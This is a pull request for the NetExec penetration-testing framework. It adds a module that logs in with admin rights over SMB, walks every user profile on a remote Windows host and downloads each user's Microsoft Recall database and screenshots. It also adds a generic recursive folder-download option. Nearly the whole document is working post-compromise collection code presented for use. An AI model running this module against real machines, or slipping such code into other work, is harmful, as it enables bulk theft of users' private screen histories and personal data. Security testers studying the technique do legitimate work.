### PR TITLE
Add Recall module for dumping all users Microsoft Recall DBs & screenshots

### DIFF
--- a/nxc/modules/recall.py
+++ b/nxc/modules/recall.py
@@ -1,0 +1,66 @@
+from impacket import smb, smb3
+import ntpath
+from os import rename
+from os.path import split, join, splitext
+from glob import glob
+
+class NXCModule:
+    """
+    Recall
+    -------
+    Module by @Marshall-Hallenbeck (@mjhallenbeck on Twitter)
+    Inspired by https://github.com/xaitax/TotalRecall
+    """
+
+    name = "recall"
+    description = "Grab all Microsoft Recall"
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def __init__(self):
+        self.context = None
+        self.module_options = None
+
+    def options(self, context, module_options):
+        self.context = context
+        self.logger = context.log
+        self.recall_path = "\\AppData\\Local\\CoreAIPlatform.00\\UKP\\"
+        
+
+
+    def on_admin_login(self, context, connection):
+        output_path = f"recall_{connection.host}"
+        self.logger.debug("Getting all user Recall folders")
+        recall_folders = connection.conn.listPath("C$", "\\Users\\*")
+        self.logger.debug(f"Recall folders: {recall_folders}")
+        if not recall_folders:
+            self.logger.fail("No Recall folders found!")
+        else:
+            self.logger.success("Recall folder(s) found, attempting to dump contents")
+        
+        for recall_folder in recall_folders:
+            if not recall_folder.is_directory():
+                continue
+            folder_name = recall_folder.get_longname()
+            self.logger.debug(f"Folder: {folder_name}")
+            if folder_name in [".", "..", "All Users", "Default", "Default User", "Public"]:
+                continue
+            
+            full_path = ntpath.normpath(join(r"Users", folder_name, self.recall_path))
+            self.logger.debug(f"Getting Recall folder {full_path}")
+            user_output_dir = join(output_path, folder_name)
+            try:
+                connection.download_folder(full_path, user_output_dir, True)
+            except (smb.SessionError, smb3.SessionError):
+                self.logger.debug(f"Folder {full_path} not found!")
+                
+            self.logger.success(f"Recall folder for user {folder_name} downloaded to {user_output_dir}")
+                
+        self.logger.debug(f"Renaming screenshots at {output_path}")
+        files = glob(f"{output_path}/*/ImageStore/*")
+        self.logger.debug(f"Files to rename: {files}")
+        for file in files:
+            directory, filename = split(file)
+            if not splitext(filename)[1]:
+                rename(file, join(directory, f"{filename}.jpg"))

--- a/nxc/protocols/smb.py
+++ b/nxc/protocols/smb.py
@@ -1299,7 +1299,38 @@ class smb(connection):
     def get_file(self):
         for src, dest in self.args.get_file:
             self.get_file_single(src, dest)
+    
+    def download_folder(self, folder, dest, recursive=False, base_dir=None):
+        normalized_folder = ntpath.normpath(folder)
+        base_folder = os.path.basename(normalized_folder)
+        self.logger.debug(f"Base folder: {base_folder}")
+        folder_wildcard = ntpath.join(folder, "*")
+        self.logger.debug(f"Requesting folder '{normalized_folder}' from share {self.args.share}")
+        items = self.conn.listPath(self.args.share, folder_wildcard)
+        self.logger.debug(f"{len(items)} items in folder: {items}")
 
+        for item in items:
+            if item.get_longname() not in [".", ".."]:
+                if item.is_directory():
+                    dir_path = ntpath.normpath(os.path.join(normalized_folder, item.get_longname()))
+                    if recursive:
+                        self.download_folder(dir_path, dest, recursive, base_dir or folder)
+                else:
+                    filename = item.get_longname()
+                    remote_file_path = ntpath.join(folder, filename)
+                    self.logger.debug(f"File found: {remote_file_path}")
+                    relative_path = folder.replace(base_dir or folder, "").lstrip("\\")
+                    relative_path = os.path.join(*relative_path.split("\\"))
+                    local_folder_path = os.path.join(dest, relative_path)
+                    local_file_path = os.path.join(local_folder_path, filename)
+                    self.logger.debug(f"Saving {remote_file_path} to {local_file_path}")
+                    os.makedirs(local_folder_path, exist_ok=True)
+                    self.get_file_single(remote_file_path, local_file_path)
+            
+    def get_folder(self):
+        recursive = self.args.recursive        
+        for folder, dest in self.args.get_folder:
+            self.download_folder(folder, dest, recursive, None)
 
     def enable_remoteops(self):
         try:

--- a/nxc/protocols/smb.py
+++ b/nxc/protocols/smb.py
@@ -1304,33 +1304,31 @@ class smb(connection):
         normalized_folder = ntpath.normpath(folder)
         base_folder = os.path.basename(normalized_folder)
         self.logger.debug(f"Base folder: {base_folder}")
-        folder_wildcard = ntpath.join(folder, "*")
-        self.logger.debug(f"Requesting folder '{normalized_folder}' from share {self.args.share}")
-        items = self.conn.listPath(self.args.share, folder_wildcard)
+
+        items = self.conn.listPath(self.args.share, ntpath.join(folder, "*"))
         self.logger.debug(f"{len(items)} items in folder: {items}")
 
         for item in items:
-            if item.get_longname() not in [".", ".."]:
-                if item.is_directory():
-                    dir_path = ntpath.normpath(os.path.join(normalized_folder, item.get_longname()))
-                    if recursive:
-                        self.download_folder(dir_path, dest, recursive, base_dir or folder)
-                else:
-                    filename = item.get_longname()
-                    remote_file_path = ntpath.join(folder, filename)
-                    self.logger.debug(f"File found: {remote_file_path}")
-                    relative_path = folder.replace(base_dir or folder, "").lstrip("\\")
-                    relative_path = os.path.join(*relative_path.split("\\"))
+            item_name = item.get_longname()
+            if item_name not in [".", ".."]:
+                dir_path = ntpath.normpath(ntpath.join(normalized_folder, item_name))
+                if item.is_directory() and recursive:
+                    self.download_folder(dir_path, dest, recursive, base_dir or folder)
+                elif not item.is_directory():
+                    remote_file_path = ntpath.join(folder, item_name)
+                    # change the Windows path to Linux and then join it with the base directory to get our actual save path
+                    relative_path = os.path.join(*folder.replace(base_dir or folder, "").lstrip("\\").split("\\"))
                     local_folder_path = os.path.join(dest, relative_path)
-                    local_file_path = os.path.join(local_folder_path, filename)
-                    self.logger.debug(f"Saving {remote_file_path} to {local_file_path}")
+                    local_file_path = os.path.join(local_folder_path, item_name)
+                    self.logger.debug(f"{dest=} {remote_file_path=} {relative_path=} {local_folder_path=} {local_file_path=}")
+                    
                     os.makedirs(local_folder_path, exist_ok=True)
                     self.get_file_single(remote_file_path, local_file_path)
-            
+
     def get_folder(self):
         recursive = self.args.recursive        
         for folder, dest in self.args.get_folder:
-            self.download_folder(folder, dest, recursive, None)
+            self.download_folder(folder, dest, recursive)
 
     def enable_remoteops(self):
         try:

--- a/nxc/protocols/smb/proto_args.py
+++ b/nxc/protocols/smb/proto_args.py
@@ -61,8 +61,6 @@ def proto_args(parser, parents):
     segroup = spidering_group.add_mutually_exclusive_group()
     segroup.add_argument("--pattern", nargs="+", help="pattern(s) to search for in folders, filenames and file content")
     segroup.add_argument("--regex", nargs="+", help="regex(s) to search for in folders, filenames and file content")
-    segroup.add_argument("--depth", type=int, default=None, help="max spider recursion depth (default: infinity & beyond)")
-    segroup.add_argument("--only-files", action="store_true", help="only spider files")
 
     files_group = smb_parser.add_argument_group("Files", "Options for remote file interaction")
     files_group.add_argument("--put-file", action="append", nargs=2, metavar="FILE", help="Put a local file into remote target, ex: whoami.txt \\\\Windows\\\\Temp\\\\whoami.txt")

--- a/nxc/protocols/smb/proto_args.py
+++ b/nxc/protocols/smb/proto_args.py
@@ -61,10 +61,14 @@ def proto_args(parser, parents):
     segroup = spidering_group.add_mutually_exclusive_group()
     segroup.add_argument("--pattern", nargs="+", help="pattern(s) to search for in folders, filenames and file content")
     segroup.add_argument("--regex", nargs="+", help="regex(s) to search for in folders, filenames and file content")
+    segroup.add_argument("--depth", type=int, default=None, help="max spider recursion depth (default: infinity & beyond)")
+    segroup.add_argument("--only-files", action="store_true", help="only spider files")
 
     files_group = smb_parser.add_argument_group("Files", "Options for remote file interaction")
     files_group.add_argument("--put-file", action="append", nargs=2, metavar="FILE", help="Put a local file into remote target, ex: whoami.txt \\\\Windows\\\\Temp\\\\whoami.txt")
     files_group.add_argument("--get-file", action="append", nargs=2, metavar="FILE", help="Get a remote file, ex: \\\\Windows\\\\Temp\\\\whoami.txt whoami.txt")
+    files_group.add_argument("--get-folder", action="append", nargs=2, metavar="DIR", help="Get a remote directory, ex: \\\\Windows\\\\Temp\\\\testing testing")
+    files_group.add_argument("--recursive", default=False, action="store_true", help="Recursively get a folder")
     files_group.add_argument("--append-host", action="store_true", help="append the host to the get-file filename")
 
     cmd_exec_group = smb_parser.add_argument_group("Command Execution", "Options for executing commands")


### PR DESCRIPTION
Gets all users Recall folders and dumps them, then renames screenshots to include .jpg (unnecessary but helpful).

I cherry-picked the download_folder functionality from #320 and then improved it due to STATUS_SHARING_VIOLATION which occurs when a file has a handle by another process open with READ|WRITE (by default we attempt to get the file with only READ).

TODO: parse database

Screenshots:
![successful_run](https://github.com/Pennyw0rth/NetExec/assets/1518719/3eba3236-376d-4428-8879-349126a2e296)
![screenshots_downloaded](https://github.com/Pennyw0rth/NetExec/assets/1518719/0cb07aee-1b2f-4a51-9251-626e60c71135)
